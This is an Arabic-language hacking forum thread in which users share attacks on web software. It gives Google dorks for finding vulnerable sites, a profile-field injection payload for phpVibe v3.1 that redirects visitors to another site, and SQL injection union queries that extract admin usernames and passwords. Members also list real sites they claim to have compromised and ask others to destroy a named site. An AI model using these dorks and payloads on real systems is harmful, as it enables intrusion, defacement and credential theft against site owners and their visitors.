Iraqe Hacker
02-10-2013, 03:19 AM
بسم الله الرحمن الرحيم
السلام عليكم اخواني
بدون مقدمات الكل يعرف هاي الثغرة
الدورك تضعو في كوكل
"Powered by phpVibe v3.1"
الاستغلال
-How to Exploit-
نذهب للتسجيل وحط اي ايميل وهمي
http://site.com/register.php
بعد التسجيل نذهب لهذا المسار للحقن بعدين تحط الكود مالك لتحقن الصفحة
http://site.com/edit-profile.php
وتذهب لمسار الاعضاء وطغط على عضويتك
http://site.com/members/
سيتم تطبيق الكود الخليتو مثال انا خليت كود يتم تحويلي لموقع اني مخترقو قبل
فقط اضغط على عضويتي
http://digitalsportsbar.com/user/2/iraqe-hacker/
وهذا الكود الي طبقتو
">"" > > < me t a http-e q u i v="Refresh" content="0;url=http://atala.is">"">
الي بلاحمر امسح الفراغات مابين الكلمة المحددة
==========================
المصدر
http://www.1337day.com/exploit/20325
تحياتي لكم
keyboy
02-10-2013, 03:38 AM
أخي ممكن تشرح أكثر المرحلة الثانبة و مشكووووووووووووووووووووور
3aziz_ziza3
02-10-2013, 03:54 AM
اخي مشكور وجزاك الله كل خير
http://www.freeimagehost.info/files/img/display/imagedisplay_b6p9nqhqk8g.gif.php
سارة الغامدي
02-10-2013, 11:09 AM
وآصل آبدآعك
يعطيك العافية
موآدع
02-10-2013, 12:00 PM
بطل حبيبي علم نافع:biggrin: ان شاء الله
Iraqe Hacker
02-10-2013, 12:48 PM
شكرا لمروركم حبايبي تشرفت بيكم
Iraqe Hacker
02-10-2013, 07:57 PM
الف شكر ياليت بالصور
ميحتاج صور شرح سهل تحياتي
Iraqe Hacker
02-10-2013, 10:35 PM
مشكـــؤر يعطيك الف عافية
الله يعافيك مشكور
Iraqe Hacker
02-14-2013, 01:37 PM
ابداأأأااأأاع
http://www.samysoft.net/fmm/fimnew/shokrmror/1/ghhfgh.gif
سرمد المهندس
02-14-2013, 02:47 PM
اضافه مني :::
ملاحظة لوحة دخول الادمن www.xxx.com\admin
الدورك
dorks:
inurl:index.php?SellerID=
inurl:supplier/index.php
intext"Development by WebDevelopmentHouse.com"
الاستغلال
لاستخراج اليوزر
buyers_subcategories.php?IndustryID=-2+/***/+Union/*!select*/1,2,LoginID from admin--
طلعنا اليوز ^^
الباسوورد
buyers_subcategories.php?IndustryID=-2+/***/+Union/*!select*/1,2,password from admin--
*
Category
People & Blogs
*
License
Standard YouTube License
Iraqe Hacker
02-14-2013, 02:51 PM
اضافه مني :::
ملاحظة لوحة دخول الادمن www.xxx.com\admin (http://www.xxx.com\admin)
الدورك
dorks:
inurl:index.php?SellerID=
inurl:supplier/index.php
intext"Development by WebDevelopmentHouse.com"
الاستغلال
لاستخراج اليوزر
buyers_subcategories.php?IndustryID=-2+/***/+Union/*!select*/1,2,LoginID from admin--
طلعنا اليوز ^^
الباسوورد
buyers_subcategories.php?IndustryID=-2+/***/+Union/*!select*/1,2,password from admin--
*
Category
People & Blogs
*
License
Standard YouTube License
مرور رائع اخ سرمد
mr.aati
02-19-2013, 10:12 PM
استمر في الابداع
تم دعس 7 مواقع من خلال الثغره تحياتي هكر بني مالك
www.mumovideo.com
www.przesada.com
www.djpov.tv
www.just-boxing.com
www.tittenisland.com
www.mytubber.com
www.digitalsportsbar.com
الذئب الاسود العراقي
02-19-2013, 11:07 PM
http://up13.up-images.com/up/viewimages/803ca55a0e.gif (http://fashion.azyya.com)
la;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,v
- - - تم التحديث - - -
la;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,v
wrest
02-25-2013, 04:41 PM
لم لفهم ماذا تقصد وكيف اخترق بهذه الثغرة, لكن وجدت موقع جنسي له نفس سكربت الثغرة وهو powerd by phpvibe v3.1 وعنوان الموقع هو : http://www.misterdevil.com/ وارجو ان كان لك القابلية والاختصاص ان تعمل على تدمير هذا الموقع .
Sh3ll-Coder
02-28-2013, 06:34 PM
يعطيك الـف عآفية حبيبي ..
LORDOFDARKNES
03-06-2013, 04:24 AM
شكرا لك حبيبي اقدر لك جهودك
Iraqe Hacker
03-06-2013, 04:10 PM
http://www.samysoft.net/fmm/fimnew/shokrmror/1/sdfsdf.gif
عبدالله97
03-20-2013, 02:32 PM
http://islamroses.com/zeenah_images/jazak.gif
Iraqe Hacker
03-20-2013, 02:37 PM
http://islamroses.com/zeenah_images/jazak.gif
مشكور لمرورك
Powered by vBulletin® Version 4.2.6 by vBS Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.